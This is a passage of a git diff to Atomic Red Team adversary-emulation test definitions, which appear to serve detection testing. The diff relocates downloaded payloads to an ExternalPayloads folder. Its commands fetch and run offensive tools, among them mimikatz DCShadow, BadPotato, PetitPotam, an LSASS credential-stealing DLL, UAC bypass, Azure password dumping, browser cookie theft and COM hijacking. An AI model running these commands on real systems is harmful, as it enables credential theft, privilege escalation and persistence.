"https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip" + Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components" -Force + Rename-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components\NSudo Launcher\x64\NSudoLG.exe" "#{nsudo_path}" + Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" -Recurse -ErrorAction Ignore executor: command: | Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd" @@ -70,12 +71,13 @@ atomic_tests: - description: | BadPotato.exe must exist in the temp directory prereq_command: | - if (Test-Path $env:temp\BadPotato.exe) {exit 0} else {exit 1} + if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\BadPotato.exe) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest -OutFile $env:TEMP\BadPotato.exe "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\BadPotato.exe "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true" executor: command: | - cd $env:temp + cd PathToAtomicsFolder\..\ExternalPayloads Start-Process .\BadPotato.exe notepad.exe Start-Sleep -Second 20 Stop-Process -Name "notepad" -force -erroraction silentlycontinue diff --git a/atomics/T1134.005/T1134.005.yaml b/atomics/T1134.005/T1134.005.yaml index 20511cae..f5603092 100644 --- a/atomics/T1134.005/T1134.005.yaml +++ b/atomics/T1134.005/T1134.005.yaml @@ -19,7 +19,7 @@ atomic_tests: mimikatz_path: description: Mimikatz windows executable type: path - default: '$env:TEMP\mimikatz\x64\mimikatz.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe' dependency_executor_name: powershell dependencies: - description: | @@ -29,6 +29,7 @@ atomic_tests: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases" $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") } diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml index 40bc28c2..8431d0e1 100644 --- a/atomics/T1135/T1135.yaml +++ b/atomics/T1135/T1135.yaml @@ -113,12 +113,13 @@ atomic_tests: default: -CheckShareAccess dependencies: - description: Invoke-ShareFinder module must exist in %TEMP% directory - prereq_command: 'if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}' + prereq_command: 'if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1) {exit 0} else {exit 1}' get_prereq_command: | - Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile $env:TEMP\PowerView.ps1 + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1 executor: command: | - Import-Module $env:TEMP\PowerView.ps1 + Import-Module PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1 Invoke-ShareFinder #{parameters} name: powershell - name: WinPwn - shareenumeration diff --git a/atomics/T1187/T1187.yaml b/atomics/T1187/T1187.yaml index 5f9d0da2..34958094 100644 --- a/atomics/T1187/T1187.yaml +++ b/atomics/T1187/T1187.yaml @@ -23,7 +23,7 @@ atomic_tests: petitpotam_path: description: PetitPotam Windows executable type: path - default: '$env:TEMP\PetitPotam.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\PetitPotam.exe' dependency_executor_name: powershell dependencies: - description: | @@ -32,6 +32,7 @@ atomic_tests: prereq_command: | if (Test-Path "#{petitpotam_path}") { exit 0 } else { exit 1 } get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/2ae559f938e67d0cd59c5afcaac67672b9ef2981/PetitPotam.exe?raw=true" -OutFile "#{petitpotam_path}" executor: name: powershell diff --git a/atomics/T1207/T1207.yaml b/atomics/T1207/T1207.yaml index b78285c7..adc552de 100644 --- a/atomics/T1207/T1207.yaml +++ b/atomics/T1207/T1207.yaml @@ -32,11 +32,11 @@ atomic_tests: mimikatz_path: description: Mimikatz windows executable type: path - default: '$env:TEMP\mimikatz\x64\mimikatz.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe' psexec_path: description: Path to PsExec type: path - default: C:\PSTools\PsExec.exe + default: PathToAtomicsFolder\..\ExternalPayloads\PSTools\PsExec.exe dependency_executor_name: powershell dependencies: - description: | @@ -57,16 +57,16 @@ atomic_tests: prereq_command: | if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" - Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null - Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "#{psexec_path}" -Force executor: name: powershell elevation_required: true command: | # starting fake DC server, as SYSTEM (required) - $dc_output_file = "$env:TEMP\art-T1207-mimikatz-DC.log" + $dc_output_file = "PathToAtomicsFolder\..\ExternalPayloads\art-T1207-mimikatz-DC.log" Remove-Item $dc_output_file -ErrorAction Ignore $mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{object} /attribute:#{attribute} /value:#{value}`" `"exit`"" $dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam" diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml index a2b21a7e..fd67dc2b 100644 --- a/atomics/T1219/T1219.yaml +++ b/atomics/T1219/T1219.yaml @@ -98,7 +98,7 @@ atomic_tests: Ammyy_Admin_Path: description: Path of Ammyy Admin executable type: path - default: $env:temp\ammyy.exe + default: PathToAtomicsFolder\..\ExternalPayloads\ammyy.exe dependency_executor_name: powershell dependencies: - description: | @@ -106,7 +106,8 @@ atomic_tests: prereq_command: | if (Test-Path #{Ammyy_Admin_Path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://web.archive.org/web/20140625232737/http://www.ammyy.com/AA_v3.exe" -OutFile "$env:temp\ammyy.exe" -UseBasicParsing + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://web.archive.org/web/20140625232737/http://www.ammyy.com/AA_v3.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ammyy.exe" -UseBasicParsing executor: command: | Start-Process #{Ammyy_Admin_Path} @@ -125,7 +126,7 @@ atomic_tests: RemotePC_Path: description: Path of RemotePC executable type: path - default: $env:temp\RemotePC.exe + default: PathToAtomicsFolder\..\ExternalPayloads\RemotePC.exe dependency_executor_name: powershell dependencies: - description: | @@ -133,6 +134,7 @@ atomic_tests: prereq_command: | if (Test-Path #{RemotePC_Path}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://static.remotepc.com/downloads/rpc/140422/RemotePC.exe" -OutFile "#{RemotePC_Path}" -UseBasicParsing executor: command: | @@ -160,7 +162,7 @@ atomic_tests: NetSupport_Path: description: Path to the NetSupport executable. type: path - default: $env:temp\T1219_NetSupport.exe + default: PathToAtomicsFolder\..\ExternalPayloads\T1219_NetSupport.exe dependency_executor_name: powershell dependencies: - description: | @@ -168,6 +170,7 @@ atomic_tests: prereq_command: | if (Test-Path #{NetSupport_Path}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null (New-Object Net.WebClient).DownloadFile("https://nsproducts.azureedge.net/nsm-1270/en/Setup.exe","#{NetSupport_Path}") executor: command: | @@ -186,7 +189,7 @@ atomic_tests: UltraViewer_Path: description: Path to the UltraViewer executable. type: path - default: $env:temp\T1219_UltraViewer.exe + default: PathToAtomicsFolder\..\ExternalPayloads\T1219_UltraViewer.exe dependency_executor_name: powershell dependencies: - description: | @@ -194,6 +197,7 @@ atomic_tests: prereq_command: | if (Test-Path #{UltraViewer_Path}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null (New-Object Net.WebClient).DownloadFile("https://www.ultraviewer.net/en/UltraViewer_setup_6.5_en.exe","#{UltraViewer_Path}") executor: command: | @@ -222,8 +226,9 @@ atomic_tests: prereq_command: | if (Test-Path #{UltraVNC_Viewer_Path}) {exit 0} else {exit 1} get_prereq_command: | - Start-BitsTransfer -Source "https://www.uvnc.eu/download/1381/UltraVNC_1_3_81_X64_Setup.exe" -Destination $env:temp\vncsetup.exe -dynamic - start-process $env:temp\vncsetup.exe /silent + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://www.uvnc.eu/download/1381/UltraVNC_1_3_81_X64_Setup.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\vncsetup.exe" + start-process PathToAtomicsFolder\..\ExternalPayloads\vncsetup.exe /silent executor: command: | Start-Process #{UltraVNC_Viewer_Path} @@ -250,8 +255,9 @@ atomic_tests: prereq_command: | if (Test-Path #{MSP360_Connect_Path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest -OutFile $env:temp\msp360connect.exe "https://s3.amazonaws.com/cb_setups/_current/cbra/setup.exe?X-Amz-Expires=604800&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIA2WIZE3YN7NOSY65U/20230515/us-east-1/s3/aws4_request&X-Amz-Date=20230515T024742Z&X-Amz-SignedHeaders=host&response-content-disposition=attachment;filename=ConnectStandaloneSetup_v3.3.0.15_netv4.5.1_cFA9100C6.exe&X-Amz-Signature=1fe3ddf93f8431b182fac90341f80a4ebf8665ddcc0e36dd385ee20d0ce865c9" - start-process $env:temp\msp360connect.exe /S + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\msp360connect.exe "https://s3.amazonaws.com/cb_setups/_current/cbra/setup.exe?X-Amz-Expires=604800&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIA2WIZE3YN7NOSY65U/20230515/us-east-1/s3/aws4_request&X-Amz-Date=20230515T024742Z&X-Amz-SignedHeaders=host&response-content-disposition=attachment;filename=ConnectStandaloneSetup_v3.3.0.15_netv4.5.1_cFA9100C6.exe&X-Amz-Signature=1fe3ddf93f8431b182fac90341f80a4ebf8665ddcc0e36dd385ee20d0ce865c9" + start-process PathToAtomicsFolder\..\ExternalPayloads\msp360connect.exe /S executor: command: | Start-Process #{MSP360_Connect_Path} diff --git a/atomics/T1482/T1482.yaml b/atomics/T1482/T1482.yaml index dfa4c0f5..d0205711 100644 --- a/atomics/T1482/T1482.yaml +++ b/atomics/T1482/T1482.yaml @@ -44,9 +44,10 @@ atomic_tests: - description: | PowerView PowerShell script must exist on disk prereq_command: | - if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1} + if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1" - description: | RSAT PowerShell AD admin cmdlets must be installed prereq_command: | @@ -55,7 +56,7 @@ atomic_tests: Write-Host "Sorry RSAT must be installed manually" executor: command: | - Import-Module "$env:TEMP\PowerView.ps1" + Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1" Get-NetDomainTrust Get-NetForestTrust Get-ADDomain @@ -147,7 +148,7 @@ atomic_tests: trufflesnout_path: description: Path to the TruffleSnout executable type: path - default: PathToAtomicsFolder\T1482\src\TruffleSnout.exe + default: PathToAtomicsFolder\..\ExternalPayloads\TruffleSnout.exe domain: description: Domain name to search on type: string diff --git a/atomics/T1485/T1485.yaml b/atomics/T1485/T1485.yaml index 39b83d83..7696c5e1 100644 --- a/atomics/T1485/T1485.yaml +++ b/atomics/T1485/T1485.yaml @@ -12,11 +12,11 @@ atomic_tests: sdelete_exe: description: Path of sdelete executable type: path - default: $env:TEMP\Sdelete\sdelete.exe + default: PathToAtomicsFolder\..\ExternalPayloads\Sdelete\sdelete.exe file_to_delete: description: Path of file to delete type: path - default: $env:TEMP\T1485.txt + default: PathToAtomicsFolder\..\ExternalPayloads\T1485.txt dependency_executor_name: powershell dependencies: - description: | @@ -24,9 +24,10 @@ atomic_tests: prereq_command: | if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip" - Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force - Remove-Item $env:TEMP\SDelete.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip PathToAtomicsFolder\..\ExternalPayloads\Sdelete -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip -Force executor: command: | if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force } diff --git a/atomics/T1486/T1486.yaml b/atomics/T1486/T1486.yaml index 63e518ef..c91fafe7 100644 --- a/atomics/T1486/T1486.yaml +++ b/atomics/T1486/T1486.yaml @@ -265,8 +265,9 @@ atomic_tests: prereq_command: | if (test-path '#{GPG_Exe_Location}'){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://files.gpg4win.org/gpg4win-4.1.0.exe" -outfile "$env:temp\gpginstall.exe" - cmd /c "$env:temp\gpginstall.exe" /S + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + invoke-webrequest "https://files.gpg4win.org/gpg4win-4.1.0.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe" + cmd /c "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe" /S executor: name: powershell elevation_required: false diff --git a/atomics/T1526/T1526.yaml b/atomics/T1526/T1526.yaml index a206fbd6..33485f59 100644 --- a/atomics/T1526/T1526.yaml +++ b/atomics/T1526/T1526.yaml @@ -29,11 +29,12 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - The Get-AzDomainInfo script must exist in $env:temp. + The Get-AzDomainInfo script must exist in PathToAtomicsFolder\..\ExternalPayloads. prereq_command: | - if (test-path $env:temp\Get-AzDomainInfo.ps1){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\Get-AzDomainInfo.ps1){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/Az/Get-AzDomainInfo.ps1" -outfile "$env:temp\Get-AzDomainInfo.ps1" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/Az/Get-AzDomainInfo.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzDomainInfo.ps1" - description: | The Az module must be installed. prereq_command: | @@ -42,7 +43,7 @@ atomic_tests: Install-Module -Name Az -Force executor: command: | - import-module "$env:temp\Get-AzDomainInfo.ps1" + import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzDomainInfo.ps1" $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password Connect-AzAccount -Credential $Credential | out-null diff --git a/atomics/T1528/T1528.yaml b/atomics/T1528/T1528.yaml index 03d8e771..aa66f138 100644 --- a/atomics/T1528/T1528.yaml +++ b/atomics/T1528/T1528.yaml @@ -28,11 +28,12 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - The Get-AzurePasswords script must exist in $env:temp. + The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads. prereq_command: | - if (test-path $env:temp\Get-AzurePasswords.ps1){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "$env:temp\Get-AzurePasswords.ps1" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1" - description: | The Azure RM module must be installed. prereq_command: | @@ -47,7 +48,7 @@ atomic_tests: Install-Module -Name Azure -Force -allowclobber executor: command: | - import-module "$env:temp\Get-AzurePasswords.ps1" + import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1" $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password Connect-AzureRmAccount -Credential $Credential diff --git a/atomics/T1530/T1530.yaml b/atomics/T1530/T1530.yaml index 9c3e1c84..a35e8535 100644 --- a/atomics/T1530/T1530.yaml +++ b/atomics/T1530/T1530.yaml @@ -20,24 +20,25 @@ atomic_tests: wordlist: description: File path to keywords for search permutations type: string - default: $env:temp\permutations.txt + default: PathToAtomicsFolder\..\ExternalPayloads\permutations.txt dependency_executor_name: powershell dependencies: - description: | - The Invoke-EnumerateAzureBlobs module must exist in $env:temp. + The Invoke-EnumerateAzureBlobs module must exist in PathToAtomicsFolder\..\ExternalPayloads. prereq_command: | - if (test-path $env:temp\Invoke-EnumerateAzureBlobs.ps1){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1" -outfile "$env:temp\Invoke-EnumerateAzureBlobs.ps1" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1" - description: | - The wordlist file for search permutations must exist in $env:temp. + The wordlist file for search permutations must exist in PathToAtomicsFolder\..\ExternalPayloads. prereq_command: | if (test-path #{wordlist}){exit 0} else {exit 1} get_prereq_command: | invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/permutations.txt" -outfile "#{wordlist}" executor: command: | - import-module "$env:temp\Invoke-EnumerateAzureBlobs.ps1" + import-module "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1" Invoke-EnumerateAzureBlobs -base #{base} -permutations #{wordlist} -outputfile "#{output_file}" cleanup_command: | remove-item #{output_file} -erroraction silentlycontinue diff --git a/atomics/T1539/T1539.yaml b/atomics/T1539/T1539.yaml index 9215dbe7..fc9d2fd2 100644 --- a/atomics/T1539/T1539.yaml +++ b/atomics/T1539/T1539.yaml @@ -13,11 +13,11 @@ atomic_tests: sqlite3_path: description: Path to sqlite3 type: path - default: $env:temp\sqlite-tools-win32-x86-3380200\sqlite3.exe + default: PathToAtomicsFolder\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe output_file: description: Filepath to output cookies type: path - default: $env:temp\T1539FirefoxCookies.txt + default: PathToAtomicsFolder\..\ExternalPayloads\T1539FirefoxCookies.txt dependency_executor_name: powershell dependencies: - description: | @@ -25,8 +25,9 @@ atomic_tests: prereq_command: | if (Test-Path #{sqlite3_path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "$env:temp\sqlite.zip" - Expand-Archive -path "$env:temp\sqlite.zip" -destinationpath "$env:temp\" -force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" + Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -force executor: command: | stop-process -name "firefox" -force -erroraction silentlycontinue @@ -53,11 +54,11 @@ atomic_tests: sqlite3_path: description: Path to sqlite3 type: path - default: $env:temp\sqlite-tools-win32-x86-3380200\sqlite3.exe + default: PathToAtomicsFolder\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe output_file: description: Filepath to output cookies type: path - default: $env:temp\T1539ChromeCookies.txt + default: PathToAtomicsFolder\..\ExternalPayloads\T1539ChromeCookies.txt dependency_executor_name: powershell dependencies: - description: | @@ -65,8 +66,9 @@ atomic_tests: prereq_command: | if (Test-Path #{sqlite3_path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "$env:temp\sqlite.zip" - Expand-Archive -path "$env:temp\sqlite.zip" -destinationpath "$env:temp\" -force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" + Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -force executor: command: | stop-process -name "chrome" -force -erroraction silentlycontinue diff --git a/atomics/T1546.015/T1546.015.yaml b/atomics/T1546.015/T1546.015.yaml index 158c8e48..9605fb57 100644 --- a/atomics/T1546.015/T1546.015.yaml +++ b/atomics/T1546.015/T1546.015.yaml @@ -17,7 +17,7 @@ atomic_tests: dllpath: description: Path to the DLL. type: string - default: $env:TEMP\AtomicTest.dll + default: PathToAtomicsFolder\..\ExternalPayloads\AtomicTest.dll clsid: description: Class ID to hijack. type: string @@ -30,7 +30,9 @@ atomic_tests: dependencies: - description: DLL For testing prereq_command: 'if (Test-Path #{dllpath}) {exit 0} else {exit 1}' - get_prereq_command: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/AtomicTest.dll" -OutFile "#{dllpath}" + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/AtomicTest.dll" -OutFile "#{dllpath}" executor: command: |- New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Value '#{clsid_description}' @@ -72,7 +74,7 @@ atomic_tests: dll_path: description: Path to the DLL. type: string - default: $env:temp\T1546.015_calc.dll + default: PathToAtomicsFolder\..\ExternalPayloads\T1546.015_calc.dll clsid: description: Class ID to hijack. type: string @@ -85,7 +87,9 @@ atomic_tests: dependencies: - description: DLL For testing prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1}' - get_prereq_command: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015_calc.dll" -OutFile "#{dll_path}" + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015_calc.dll" -OutFile "#{dll_path}" executor: command: |- New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Value '#{clsid_description}' diff --git a/atomics/T1547.008/T1547.008.yaml b/atomics/T1547.008/T1547.008.yaml index 624a5d02..b48cfd47 100644 --- a/atomics/T1547.008/T1547.008.yaml +++ b/atomics/T1547.008/T1547.008.yaml @@ -15,7 +15,7 @@ atomic_tests: dll_path: description: Module to be loaded into LSASS type: path - default: '$env:TEMP\lsass_lib.dll' + default: 'PathToAtomicsFolder\..\ExternalPayloads\lsass_lib.dll' dependency_executor_name: powershell dependencies: - description: | @@ -24,6 +24,7 @@ atomic_tests: if (Test-Path #{dll_path}) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://github.com/oxfemale/LogonCredentialsSteal/raw/53e74251f397ddeab2bd1348c3ff26d702cfd836/lsass_lib/x64/Release/lsass_lib.dll" -UseBasicParsing -OutFile "#{dll_path}" executor: command: | diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml index 80ecc3c5..59a64880 100644 --- a/atomics/T1548.002/T1548.002.yaml +++ b/atomics/T1548.002/T1548.002.yaml @@ -214,7 +214,7 @@ atomic_tests: uacme_exe: description: Path to uacme executable type: path - default: '%temp%\uacme\23 Akagi64.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\23 Akagi64.exe' dependency_executor_name: powershell dependencies: - description: | @@ -223,9 +223,11 @@ atomic_tests: $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip" - Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force - Remove-Item $env:TEMP\uacme.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force executor: command: | "#{uacme_exe}" @@ -260,7 +262,7 @@ atomic_tests: uacme_exe: description: Path to uacme executable type: path - default: '%temp%\uacme\31 Akagi64.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\31 Akagi64.exe' dependency_executor_name: powershell dependencies: - 